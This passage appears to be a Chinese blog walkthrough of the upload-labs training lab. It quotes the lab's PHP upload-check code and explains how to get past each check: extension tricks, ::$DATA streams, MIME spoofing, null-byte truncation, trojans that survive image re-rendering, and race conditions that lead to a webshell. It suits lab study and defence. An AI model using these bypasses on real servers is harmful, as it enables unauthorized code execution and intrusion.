array(&quot;.php&quot;,&quot;.php5&quot;,&quot;.php4&quot;,&quot;.php3&quot;,&quot;.php2&quot;,&quot;.html&quot;,&quot;.htm&quot;,&quot;.phtml&quot;,&quot;.pht&quot;,&quot;.pHp&quot;,&quot;.pHp5&quot;,&quot;.pHp4&quot;,&quot;.pHp3&quot;,&quot;.pHp2&quot;,&quot;.Html&quot;,&quot;.Htm&quot;,&quot;.pHtml&quot;,&quot;.jsp&quot;,&quot;.jspa&quot;,&quot;.jspx&quot;,&quot;.jsw&quot;,&quot;.jsv&quot;,&quot;.jspf&quot;,&quot;.jtml&quot;,&quot;.jSp&quot;,&quot;.jSpx&quot;,&quot;.jSpa&quot;,&quot;.jSw&quot;,&quot;.jSv&quot;,&quot;.jSpf&quot;,&quot;.jHtml&quot;,&quot;.asp&quot;,&quot;.aspx&quot;,&quot;.asa&quot;,&quot;.asax&quot;,&quot;.ascx&quot;,&quot;.ashx&quot;,&quot;.asmx&quot;,&quot;.cer&quot;,&quot;.aSp&quot;,&quot;.aSpx&quot;,&quot;.aSa&quot;,&quot;.aSax&quot;,&quot;.aScx&quot;,&quot;.aShx&quot;,&quot;.aSmx&quot;,&quot;.cEr&quot;,&quot;.sWf&quot;,&quot;.swf&quot;,&quot;.htaccess&quot;,&quot;.ini&quot;);\n        $file_name = trim($_FILES[&#039;upload_file&#039;][&#039;name&#039;]);\n        $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n        $file_ext = strrchr($file_name, &#039;.&#039;);\n        $file_ext = str_ireplace(&#039;::$DATA&#039;, &#039;&#039;, $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n        $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n        if (!in_array($file_ext, $deny_ext)) {\n            $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n            $img_path = UPLOAD_PATH.&#039;\/&#039;.date(&quot;YmdHis&quot;).rand(1000,9999).$file_ext;\n            if (move_uploaded_file($temp_file, $img_path)) {\n                $is_upload = true;\n            } else {\n                $msg = &#039;\u4e0a\u4f20\u51fa\u9519\uff01&#039;;\n            }\n        } else {\n            $msg = &#039;\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01&#039;;\n        }\n    } else {\n        $msg = UPLOAD_PATH . &#039;\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01&#039;;\n    }\n}<\/code><\/pre>\n<p>\u7531\u4e8e\u6ca1\u6709\u5bf9\u6587\u4ef6\u540e\u7f00\u540d\u8fdb\u884c\u53bb\u7a7a\uff0c\u56e0\u6b64\u53ef\u4ee5\u5728\u540e\u7f00\u540d\u52a0\u7a7a\u683c\u7ed5\u8fc7\uff0c\u6587\u4ef6\u5c5e\u6027\u4e0d\u4f1a\u53d8<\/p>\n<h6><strong><code>::$$DATA\u6570\u636e\u6d41\u7ed5\u8fc7<\/code><\/strong>-upload-labs-08<\/h6>\n<p>\u5728php+windows\u7684\u60c5\u51b5\u4e0b\uff1a\u5982\u679c\u6587\u4ef6\u540d+\u201d<code>::$DATA<\/code>\u201c\u4f1a\u628a<code>::$DATA<\/code>\u4e4b\u540e\u7684\u6570\u636e\u5f53\u6210\u6587\u4ef6\u6d41\u5904\u7406,\u4e0d\u4f1a\u68c0\u6d4b\u540e\u7f00\u540d.\u4e14\u4fdd\u6301\u201d<code>::$DATA<\/code>\u201c\u4e4b\u524d\u7684\u6587\u4ef6\u540d<\/p>\n<h6><strong>\u914d\u5408\u89e3\u6790\u7ed5\u8fc7  upload-labs-9<\/strong><\/h6>\n<pre><code class=\"language-php\">$is_upload = false;\n$msg = null;\nif (isset($_POST[&#039;submit&#039;])) {\n    if (file_exists(UPLOAD_PATH)) {\n        $deny_ext = array(&quot;.php&quot;,&quot;.php5&quot;,&quot;.php4&quot;,&quot;.php3&quot;,&quot;.php2&quot;,&quot;.html&quot;,&quot;.htm&quot;,&quot;.phtml&quot;,&quot;.pht&quot;,&quot;.pHp&quot;,&quot;.pHp5&quot;,&quot;.pHp4&quot;,&quot;.pHp3&quot;,&quot;.pHp2&quot;,&quot;.Html&quot;,&quot;.Htm&quot;,&quot;.pHtml&quot;,&quot;.jsp&quot;,&quot;.jspa&quot;,&quot;.jspx&quot;,&quot;.jsw&quot;,&quot;.jsv&quot;,&quot;.jspf&quot;,&quot;.jtml&quot;,&quot;.jSp&quot;,&quot;.jSpx&quot;,&quot;.jSpa&quot;,&quot;.jSw&quot;,&quot;.jSv&quot;,&quot;.jSpf&quot;,&quot;.jHtml&quot;,&quot;.asp&quot;,&quot;.aspx&quot;,&quot;.asa&quot;,&quot;.asax&quot;,&quot;.ascx&quot;,&quot;.ashx&quot;,&quot;.asmx&quot;,&quot;.cer&quot;,&quot;.aSp&quot;,&quot;.aSpx&quot;,&quot;.aSa&quot;,&quot;.aSax&quot;,&quot;.aScx&quot;,&quot;.aShx&quot;,&quot;.aSmx&quot;,&quot;.cEr&quot;,&quot;.sWf&quot;,&quot;.swf&quot;,&quot;.htaccess&quot;,&quot;.ini&quot;);\n        $file_name = trim($_FILES[&#039;upload_file&#039;][&#039;name&#039;]);\n        $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n        $file_ext = strrchr($file_name, &#039;.&#039;);\/\/\u8fdb\u884c\u62fc\u63a5\n        $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n        $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n        if (!in_array($file_ext, $deny_ext)) {\n            $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n            $img_path = UPLOAD_PATH.&#039;\/&#039;.date(&quot;YmdHis&quot;).rand(1000,9999).$file_ext;\n            if (move_uploaded_file($temp_file, $img_path)) {\n                $is_upload = true;\n            } else {\n                $msg = &#039;\u4e0a\u4f20\u51fa\u9519\uff01&#039;;\n            }\n        } else {\n            $msg = &#039;\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01&#039;;\n        }\n    } else {\n        $msg = UPLOAD_PATH . &#039;\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01&#039;;\n    }\n}\n<\/code><\/pre>\n<p>\u7531\u4e8e\u4ee3\u7801\u5bf9\u6587\u4ef6\u540d\u6700\u540e\u662f\u8fdb\u884c\u62fc\u63a5\u7684\uff0c\u53ef\u4ee5\u4f2a\u9020\u6587\u4ef6\u540d<br \/>\n\u4ee3\u7801\u5148\u662f\u53bb\u9664\u6587\u4ef6\u540d\u524d\u540e\u7684\u7a7a\u683c\uff0c\u518d\u53bb\u9664\u6587\u4ef6\u540d\u6700\u540e\u6240\u6709\u7684\u201c.\u201d\uff0c\u518d\u901a\u8fc7strrchar\u51fd\u6570\u6765\u5bfb\u627e\u201c.\u201d\u6765\u786e\u8ba4\u6587\u4ef6\u540d\u7684\u540e\u7f00\uff0c\u4f46\u662f\u6700\u540e\u4fdd\u5b58\u6587\u4ef6\u7684\u65f6\u5019\u6ca1\u6709\u91cd\u547d\u540d\u800c\u4f7f\u7528\u7684\u539f\u59cb\u7684\u6587\u4ef6\u540d\uff0c\u5bfc\u81f4\u53ef\u4ee5\u5229\u75281.php. .\uff08\u70b9+\u7a7a\u683c+\u70b9\uff09\u6765\u7ed5\u8fc7<\/p>\n<h6><strong>\u53cc\u540e\u7f00\u89e3\u6790 upload-labs-10<\/strong><\/h6>\n<pre><code class=\"language-php\">$is_upload = false;\n$msg = null;\nif (isset($_POST[&#039;submit&#039;])) {\n    if (file_exists(UPLOAD_PATH)) {\n        $deny_ext = array(&quot;.php&quot;,&quot;.php5&quot;,&quot;.php4&quot;,&quot;.php3&quot;,&quot;.php2&quot;,&quot;.html&quot;,&quot;.htm&quot;,&quot;.phtml&quot;,&quot;.pht&quot;,&quot;.pHp&quot;,&quot;.pHp5&quot;,&quot;.pHp4&quot;,&quot;.pHp3&quot;,&quot;.pHp2&quot;,&quot;.Html&quot;,&quot;.Htm&quot;,&quot;.pHtml&quot;,&quot;.jsp&quot;,&quot;.jspa&quot;,&quot;.jspx&quot;,&quot;.jsw&quot;,&quot;.jsv&quot;,&quot;.jspf&quot;,&quot;.jtml&quot;,&quot;.jSp&quot;,&quot;.jSpx&quot;,&quot;.jSpa&quot;,&quot;.jSw&quot;,&quot;.jSv&quot;,&quot;.jSpf&quot;,&quot;.jHtml&quot;,&quot;.asp&quot;,&quot;.aspx&quot;,&quot;.asa&quot;,&quot;.asax&quot;,&quot;.ascx&quot;,&quot;.ashx&quot;,&quot;.asmx&quot;,&quot;.cer&quot;,&quot;.aSp&quot;,&quot;.aSpx&quot;,&quot;.aSa&quot;,&quot;.aSax&quot;,&quot;.aScx&quot;,&quot;.aShx&quot;,&quot;.aSmx&quot;,&quot;.cEr&quot;,&quot;.sWf&quot;,&quot;.swf&quot;,&quot;.htaccess&quot;,&quot;.ini&quot;);\n        $file_name = trim($_FILES[&#039;upload_file&#039;][&#039;name&#039;]);\n        $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n        $file_ext = strrchr($file_name, &#039;.&#039;);\n        $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n        $file_ext = str_ireplace(&#039;::$DATA&#039;, &#039;&#039;, $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n        $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n        if (!in_array($file_ext, $deny_ext)) {\n            $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n            $img_path = UPLOAD_PATH.&#039;\/&#039;.$file_name;\n            if (move_uploaded_file($temp_file, $img_path)) {\n                $is_upload = true;\n            } else {\n                $msg = &#039;\u4e0a\u4f20\u51fa\u9519\uff01&#039;;\n            }\n        } else {\n            $msg = &#039;\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01&#039;;\n        }\n    } else {\n        $msg = UPLOAD_PATH . &#039;\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01&#039;;\n    }\n}<\/code><\/pre>\n<p>\u7531\u4e8e\u4ee3\u7801\u51fd\u6570\u903b\u8f91\u539f\u56e0\uff0c1.pphphp \u6700\u540e\u7ecf\u8fc7\u51fd\u6570\u8fc7\u6ee4\u5b8c\u53c8\u6062\u590d\u4e3a1.php\u4ece\u800c\u7ed5\u8fc7\u3002\u5177\u4f53\u8fd8\u662f\u8981\u4ee3\u7801\u5ba1\u8ba1\uff0c\u67e5\u627e\u914d\u5408\u89e3\u6790\u6f0f\u6d1e<\/p>\n<h5>\u767d\u540d\u5355\u7ed5\u8fc7<\/h5>\n<h6><strong>MIME\u7ed5\u8fc7-uplod-labs-02<\/strong><\/h6>\n<p>MIME\u5373\u4e3aContent-Type: image\/gif  \u5728\u6709\u4e9b\u65f6\u5019\u5bf9MIME\u6709\u8fc7\u6ee4\uff0c\u5373\u53ef\u5c06\u5141\u8bb8\u4e0a\u4f20\u6587\u4ef6MIMEcopy\u7ed9\u8981\u4e0a\u4f20\u7684\u6587\u4ef6\u5c5e\u6027\uff0c\u4ece\u800c\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n<pre><code>text\/plain\uff1a\u7eaf\u6587\u672c\uff0c\u6587\u4ef6\u6269\u5c55\u540d.txt\ntext\/html\uff1aHTML\u6587\u672c\uff0c\u6587\u4ef6\u6269\u5c55\u540d.htm\u548c.html\nimage\/jpeg\uff1ajpeg\u683c\u5f0f\u7684\u56fe\u7247\uff0c\u6587\u4ef6\u6269\u5c55\u540d.jpg\nimage\/gif\uff1aGIF\u683c\u5f0f\u7684\u56fe\u7247\uff0c\u6587\u4ef6\u6269\u5c55\u540d.gif\naudio\/x-wave\uff1aWAVE\u683c\u5f0f\u7684\u97f3\u9891\uff0c\u6587\u4ef6\u6269\u5c55\u540d.wav\naudio\/mpeg\uff1aMP3\u683c\u5f0f\u7684\u97f3\u9891\uff0c\u6587\u4ef6\u6269\u5c55\u540d.mp3\nvideo\/mpeg\uff1aMPEG\u683c\u5f0f\u7684\u89c6\u9891\uff0c\u6587\u4ef6\u6269\u5c55\u540d.mpg\napplication\/zip\uff1aPK-ZIP\u683c\u5f0f\u7684\u538b\u7f29\u6587\u4ef6\uff0c\u6587\u4ef6\u6269\u5c55\u540d.zip<\/code><\/pre>\n<h6><strong>%00\u622a\u65ad-upload-labs\u201311<\/strong><\/h6>\n<p>\u622a\u65ad\u6761\u4ef6\uff1aphp\u7248\u672c\u5c0f\u4e8e5.3.4\uff0cphp\u7684magic_quotes_gpc\u4e3aOFF\u72b6\u6001<br \/>\n%00\u622a\u65ad\u7528\u5728\u6570\u636e\u5305\u7684\u6587\u4ef6url\u5730\u5740\u4e0a\u9762\uff0c\u5728url\u5730\u5740\u6587\u4ef6\u5730\u5740\u540e\u52a0\u4e0a\u622a\u65ad\u5373\u53ef<\/p>\n<pre><code>\/upload\/1.php%00 \u4f7f\u62fc\u63a5\u65e0\u6cd5\u5b9e\u73b0 \u539f\u6765\u56fe\u7247\u5305\u542b\u6587\u4ef6\u5185\u5bb9\u5c06\u5199\u51651.php \uff0c\u8bbf\u95ee1.php\u5373\u53ef<\/code><\/pre>\n<h6><strong>0x00\u622a\u65ad-upload-labs-12<\/strong><\/h6>\n<pre><code class=\"language-php\">$is_upload = false;\n$msg = null;\nif(isset($_POST[&#039;submit&#039;])){\n    $ext_arr = array(&#039;jpg&#039;,&#039;png&#039;,&#039;gif&#039;);\n    $file_ext = substr($_FILES[&#039;upload_file&#039;][&#039;name&#039;],strrpos($_FILES[&#039;upload_file&#039;][&#039;name&#039;],&quot;.&quot;)+1);\n    if(in_array($file_ext,$ext_arr)){\n        $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n        $img_path = $_POST[&#039;save_path&#039;].&quot;\/&quot;.rand(10, 99).date(&quot;YmdHis&quot;).&quot;.&quot;.$file_ext;\n\n        if(move_uploaded_file($temp_file,$img_path)){\n            $is_upload = true;\n        } else {\n            $msg = &quot;\u4e0a\u4f20\u5931\u8d25&quot;;\n        }\n    } else {\n        $msg = &quot;\u53ea\u5141\u8bb8\u4e0a\u4f20.jpg|.png|.gif\u7c7b\u578b\u6587\u4ef6\uff01&quot;;\n    }\n}<\/code><\/pre>\n<p>save_path\u53c2\u6570\u901a\u8fc7POST\u65b9\u5f0f\u4f20\u9012\uff0c\u8fd8\u662f\u5229\u752800\u622a\u65ad\uff0c\u56e0\u4e3aPOST\u4e0d\u4f1a\u50cfGET\u5bf9%00\u8fdb\u884c\u81ea\u52a8\u89e3\u7801\uff0c\u6240\u4ee5\u9700\u8981\u5728\u4e8c\u8fdb\u5236\u4e2d\u8fdb\u884c\u4fee\u6539<br \/>\n\u7531\u4e8eget\u8bf7\u6c42\u4f1a\u5bf9\u4e00\u4e9b\u5b57\u7b26\u81ea\u52a8\u89e3\u7801\uff0c\u800c\u5728post\u4f20\u9012\uff0c\u4e0d\u4f1a\u5bf9\u5b57\u7b26\u89e3\u7801\uff0c\u6545\u9700\u8981\u6211\u4eec\u81ea\u5df1\u8f6c\u6362<br \/>\n\u8fd9\u79cd\u622a\u65ad\u4e0d\u540c\u4e8e%00\uff0c\u5b83\u662f\u5728\u6570\u636e\u5305\u4e2d\u95f4\u7684\u6587\u4ef6\u5730\u5740\uff0c\u6587\u4ef6\u540d\u540e\u622a\u65ad<\/p>\n<p>0x\u5f00\u5934\u8868\u793a16\u8fdb\u5236\uff0c0\u5728\u5341\u516d\u8fdb\u5236\u4e2d\u662f00, 0x00\u5c31\u662f%00\u89e3\u7801\u6210\u768416\u8fdb\u5236<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220325164231469-164922824059819.png\" alt=\"image-20220325164231469\" \/><\/p>\n<p>\u5c0620\u6539\u4e3a00<\/p>\n<h6><strong>0x0a\u622a\u65ad<\/strong><\/h6>\n<p>0x0a\u662f\u5341\u516d\u8fdb\u5236\u8868\u793a\u65b9\u6cd5\uff0c\u8868\u793aASCII\u7801\u4e3a\/n\u7684\u6362\u884c\u5b57\u7b26\uff0c\u5177\u4f53\u4e3a\u6362\u884c\u81f3\u4e0b\u4e00\u884c\u884c\u9996\u8d77\u59cb\u4f4d\u7f6e<\/p>\n<h5>\u5176\u4ed6\u7c7b\u578b<\/h5>\n<h6><strong>\u6587\u4ef6\u5934\u68c0\u6d4b\u7ed5\u8fc7<\/strong><\/h6>\n<p>\u56fe\u7247\u6587\u4ef6\u4ee5\u5b57\u7b26\u5c55\u793a\u51fa\u6765\u65f6\u5019\uff0c\u6bcf\u4e00\u79cd\u683c\u5f0f\u7684\u56fe\u7247\u7684\u524d\u51e0\u4e2a\u5b57\u7b26\u662f\u56fa\u5b9a\uff0c\u6216\u8005\u662f\u6570\u636e\u5305\u91cc\u9762\u7684Content-Type\u7c7b\u578b\u4fee\u6539\uff0c\u4ece\u800c\u7ed5\u8fc7\u4e0a\u4f20<\/p>\n<h6><strong>\u4e8c\u6b21\u6e32\u67d3\u4e0a\u4f20\u7ed5\u8fc7-upload-labs-16<\/strong><\/h6>\n<pre><code class=\"language-php\">function isImage($filename){\n    \/\/\u9700\u8981\u5f00\u542fphp_exif\u6a21\u5757\n    $image_type = exif_imagetype($filename);\n    switch ($image_type) {\n        case IMAGETYPE_GIF:\n            return &quot;gif&quot;;\n            break;\n        case IMAGETYPE_JPEG:\n            return &quot;jpg&quot;;\n            break;\n        case IMAGETYPE_PNG:\n            return &quot;png&quot;;\n            break;    \n        default:\n            return false;\n            break;\n    }\n}\n\n$is_upload = false;\n$msg = null;\nif(isset($_POST[&#039;submit&#039;])){\n    $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n    $res = isImage($temp_file);\n    if(!$res){\n        $msg = &quot;\u6587\u4ef6\u672a\u77e5\uff0c\u4e0a\u4f20\u5931\u8d25\uff01&quot;;\n    }else{\n        $img_path = UPLOAD_PATH.&quot;\/&quot;.rand(10, 99).date(&quot;YmdHis&quot;).&quot;.&quot;.$res;\n        if(move_uploaded_file($temp_file,$img_path)){\n            $is_upload = true;\n        } else {\n            $msg = &quot;\u4e0a\u4f20\u51fa\u9519\uff01&quot;;\n        }\n    }\n}<\/code><\/pre>\n<p>\u5728\u6211\u4eec\u5c06\u6587\u4ef6\u4e0a\u4f20\u5230\u670d\u52a1\u5668\uff0c\u6709\u4e00\u4e9b\u670d\u52a1\u5668\u4f1a\u5bf9\u4e0a\u4f20\u7684\u6587\u4ef6\u8fdb\u884c\u4e8c\u6b21\u4fee\u6539\uff0c\u4ee5\u670d\u52a1\u5668\u7684\u7c7b\u578b\u50a8\u5b58\u8d77\u6765\uff0c\u4f46\u662f\u6587\u4ef6\u7684\u5916\u8868\u4e0d\u4f1a\u53d8\u5316\uff0c\u6587\u4ef6\u7684hex\u503c\u4f1a\u53d1\u751f\u4e00\u4e9b\u53d8\u5316\uff0c\u5728upload-16\u5173\uff0c\u53d1\u73b0\u670d\u52a1\u5668\u5bf9\u6211\u4eec\u4e0a\u4f20\u7684\u6587\u4ef6\u8fdb\u884c\u4e8c\u6b21\u6e32\u67d3\uff0c\u5f53\u6211\u4eec\u4e4b\u524d\u5c06\u4e00\u53e5\u8bdd\u6728\u9a6c\u63d2\u5165\u7ecf\u8fc7\u670d\u52a1\u5668\u50a8\u5b58\u540e\u518d\u6b21\u67e5\u770bhex\u503c\u53d1\u73b0\u5f88\u591a\u5730\u65b9\u7684\u503c\u53d1\u751f\u6539\u53d8\uff0c\u6211\u4eec\u7ecf\u8fc7\u539f\u56fe\u7247hex\u503c\u5bf9\u6bd4\uff0c\u53d1\u73b0\u4f1a\u6709\u4e0d\u4f1a\u6539\u53d8\u7684\u503c\uff0c\u6211\u4eec\u5c06\u6728\u9a6c\u63d2\u5165\u5230\u8fd9\u4e00\u4e32\u4e0d\u4f1a\u6539\u53d8\u7684\u503c\u7684\u4f4d\u7f6e\u91cc\u9762\uff0c\u4ece\u800c\u5b9e\u73b0\u4e0a\u4f20webshell<\/p>\n<h6><strong>\u6761\u4ef6\u7ade\u4e89\u7ed5\u8fc7-upload-labs-17<\/strong><\/h6>\n<pre><code class=\"language-php\">$is_upload = false;\n$msg = null;\nif (isset($_POST[&#039;submit&#039;])){\n    \/\/ \u83b7\u5f97\u4e0a\u4f20\u6587\u4ef6\u7684\u57fa\u672c\u4fe1\u606f\uff0c\u6587\u4ef6\u540d\uff0c\u7c7b\u578b\uff0c\u5927\u5c0f\uff0c\u4e34\u65f6\u6587\u4ef6\u8def\u5f84\n    $filename = $_FILES[&#039;upload_file&#039;][&#039;name&#039;];\n    $filetype = $_FILES[&#039;upload_file&#039;][&#039;type&#039;];\n    $tmpname = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n\n    $target_path=UPLOAD_PATH.&#039;\/&#039;.basename($filename);\n\n    \/\/ \u83b7\u5f97\u4e0a\u4f20\u6587\u4ef6\u7684\u6269\u5c55\u540d\n    $fileext= substr(strrchr($filename,&quot;.&quot;),1);\n\n    \/\/\u5224\u65ad\u6587\u4ef6\u540e\u7f00\u4e0e\u7c7b\u578b\uff0c\u5408\u6cd5\u624d\u8fdb\u884c\u4e0a\u4f20\u64cd\u4f5c\n    if(($fileext == &quot;jpg&quot;) &amp;&amp; ($filetype==&quot;image\/jpeg&quot;)){\n        if(move_uploaded_file($tmpname,$target_path)){\n            \/\/\u4f7f\u7528\u4e0a\u4f20\u7684\u56fe\u7247\u751f\u6210\u65b0\u7684\u56fe\u7247\n            $im = imagecreatefromjpeg($target_path);\n\n            if($im == false){\n                $msg = &quot;\u8be5\u6587\u4ef6\u4e0d\u662fjpg\u683c\u5f0f\u7684\u56fe\u7247\uff01&quot;;\n                @unlink($target_path);\n            }else{\n                \/\/\u7ed9\u65b0\u56fe\u7247\u6307\u5b9a\u6587\u4ef6\u540d\n                srand(time());\n                $newfilename = strval(rand()).&quot;.jpg&quot;;\n                \/\/\u663e\u793a\u4e8c\u6b21\u6e32\u67d3\u540e\u7684\u56fe\u7247\uff08\u4f7f\u7528\u7528\u6237\u4e0a\u4f20\u56fe\u7247\u751f\u6210\u7684\u65b0\u56fe\u7247\uff09\n                $img_path = UPLOAD_PATH.&#039;\/&#039;.$newfilename;\n                imagejpeg($im,$img_path);\n                @unlink($target_path);\n                $is_upload = true;\n            }\n        } else {\n            $msg = &quot;\u4e0a\u4f20\u51fa\u9519\uff01&quot;;\n        }\n\n    }else if(($fileext == &quot;png&quot;) &amp;&amp; ($filetype==&quot;image\/png&quot;)){\n        if(move_uploaded_file($tmpname,$target_path)){\n            \/\/\u4f7f\u7528\u4e0a\u4f20\u7684\u56fe\u7247\u751f\u6210\u65b0\u7684\u56fe\u7247\n            $im = imagecreatefrompng($target_path);\n\n            if($im == false){\n                $msg = &quot;\u8be5\u6587\u4ef6\u4e0d\u662fpng\u683c\u5f0f\u7684\u56fe\u7247\uff01&quot;;\n                @unlink($target_path);\n            }else{\n                 \/\/\u7ed9\u65b0\u56fe\u7247\u6307\u5b9a\u6587\u4ef6\u540d\n                srand(time());\n                $newfilename = strval(rand()).&quot;.png&quot;;\n                \/\/\u663e\u793a\u4e8c\u6b21\u6e32\u67d3\u540e\u7684\u56fe\u7247\uff08\u4f7f\u7528\u7528\u6237\u4e0a\u4f20\u56fe\u7247\u751f\u6210\u7684\u65b0\u56fe\u7247\uff09\n                $img_path = UPLOAD_PATH.&#039;\/&#039;.$newfilename;\n                imagepng($im,$img_path);\n\n                @unlink($target_path);\n                $is_upload = true;               \n            }\n        } else {\n            $msg = &quot;\u4e0a\u4f20\u51fa\u9519\uff01&quot;;\n        }\n\n    }else if(($fileext == &quot;gif&quot;) &amp;&amp; ($filetype==&quot;image\/gif&quot;)){\n        if(move_uploaded_file($tmpname,$target_path)){\n            \/\/\u4f7f\u7528\u4e0a\u4f20\u7684\u56fe\u7247\u751f\u6210\u65b0\u7684\u56fe\u7247\n            $im = imagecreatefromgif($target_path);\n            if($im == false){\n                $msg = &quot;\u8be5\u6587\u4ef6\u4e0d\u662fgif\u683c\u5f0f\u7684\u56fe\u7247\uff01&quot;;\n                @unlink($target_path);\n            }else{\n                \/\/\u7ed9\u65b0\u56fe\u7247\u6307\u5b9a\u6587\u4ef6\u540d\n                srand(time());\n                $newfilename = strval(rand()).&quot;.gif&quot;;\n                \/\/\u663e\u793a\u4e8c\u6b21\u6e32\u67d3\u540e\u7684\u56fe\u7247\uff08\u4f7f\u7528\u7528\u6237\u4e0a\u4f20\u56fe\u7247\u751f\u6210\u7684\u65b0\u56fe\u7247\uff09\n                $img_path = UPLOAD_PATH.&#039;\/&#039;.$newfilename;\n                imagegif($im,$img_path);\n\n                @unlink($target_path);\n                $is_upload = true;\n            }\n        } else {\n            $msg = &quot;\u4e0a\u4f20\u51fa\u9519\uff01&quot;;\n        }\n    }else{\n        $msg = &quot;\u53ea\u5141\u8bb8\u4e0a\u4f20\u540e\u7f00\u4e3a.jpg|.png|.gif\u7684\u56fe\u7247\u6587\u4ef6\uff01&quot;;\n    }\n}<\/code><\/pre>\n<p>\u7ade\u4e89\u6761\u4ef6\u53d1\u751f\u5728\u591a\u4e2a\u7ebf\u7a0b\u540c\u65f6\u8bbf\u95ee\u540c\u4e00\u4e2a\u5171\u4eab\u4ee3\u7801\u3001\u53d8\u91cf\u3001\u6587\u4ef6\u7b49\u6ca1\u6709\u8fdb\u884c\u9501\u64cd\u4f5c\u6216\u8005\u540c\u6b65\u64cd\u4f5c\u7684\u573a\u666f\u4e2d\u3002\u5f00\u53d1\u8005\u5728\u8fdb\u884c\u4ee3\u7801\u5f00\u53d1\u65f6\u5e38\u5e38\u503e\u5411\u4e8e\u8ba4\u4e3a\u4ee3\u7801\u4f1a\u4ee5\u7ebf\u6027\u7684\u65b9\u5f0f\u6267\u884c\uff0c\u800c\u4e14\u4ed6\u4eec\u5ffd\u89c6\u4e86\u5e76\u884c\u670d\u52a1\u5668\u4f1a\u5e76\u53d1\u6267\u884c\u591a\u4e2a\u7ebf\u7a0b\uff0c\u8fd9\u5c31\u4f1a\u5bfc\u81f4\u610f\u60f3\u4e0d\u5230\u7684\u7ed3\u679c\u3002\u601d\u8def\u662f\u9996\u5148\u4e0a\u4f20\u4e00\u4e2aphp\u6587\u4ef6\uff0c\u5f53\u7136\u8fd9\u4e2a\u6587\u4ef6\u4f1a\u88ab\u7acb\u9a6c\u5220\u6389\uff0c\u6240\u4ee5\u6211\u4eec\u4f7f\u7528\u591a\u7ebf\u7a0b\u5e76\u53d1\u7684\u8bbf\u95ee\u4e0a\u4f20\u7684\u6587\u4ef6\uff0c\u603b\u4f1a\u6709\u4e00\u6b21\u5728\u4e0a\u4f20\u6587\u4ef6\u5230\u5220\u9664\u6587\u4ef6\u8fd9\u4e2a\u65f6\u95f4\u6bb5\u5185\u8bbf\u95ee\u5230\u4e0a\u4f20\u7684php\u6587\u4ef6\uff0c\u4e00\u65e6\u6211\u4eec\u6210\u529f\u8bbf\u95ee\u5230\u4e86\u4e0a\u4f20\u7684\u6587\u4ef6\uff0c\u90a3\u4e48\u5b83\u5c31\u4f1a\u5411\u670d\u52a1\u5668\u5199\u4e00\u4e2ashell<\/p>\n<h6><strong>\u7a81\u7834getimagesize \u7ed5\u8fc7-upload-labs-14<\/strong><\/h6>\n<pre><code class=\"language-php\">function getReailFileType($filename){\n    $file = fopen($filename, &quot;rb&quot;);\n    $bin = fread($file, 2); \/\/\u53ea\u8bfb2\u5b57\u8282\n    fclose($file);\n    $strInfo = @unpack(&quot;C2chars&quot;, $bin);    \n    $typeCode = intval($strInfo[&#039;chars1&#039;].$strInfo[&#039;chars2&#039;]);    \n    $fileType = &#039;&#039;;    \n    switch($typeCode){      \n        case 255216:            \n            $fileType = &#039;jpg&#039;;\n            break;\n        case 13780:            \n            $fileType = &#039;png&#039;;\n            break;        \n        case 7173:            \n            $fileType = &#039;gif&#039;;\n            break;\n        default:            \n            $fileType = &#039;unknown&#039;;\n        }    \n        return $fileType;\n}\n\n$is_upload = false;\n$msg = null;\nif(isset($_POST[&#039;submit&#039;])){\n    $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n    $file_type = getReailFileType($temp_file);\n\n    if($file_type == &#039;unknown&#039;){\n        $msg = &quot;\u6587\u4ef6\u672a\u77e5\uff0c\u4e0a\u4f20\u5931\u8d25\uff01&quot;;\n    }else{\n        $img_path = UPLOAD_PATH.&quot;\/&quot;.rand(10, 99).date(&quot;YmdHis&quot;).&quot;.&quot;.$file_type;\n        if(move_uploaded_file($temp_file,$img_path)){\n            $is_upload = true;\n        } else {\n            $msg = &quot;\u4e0a\u4f20\u51fa\u9519\uff01&quot;;\n        }\n    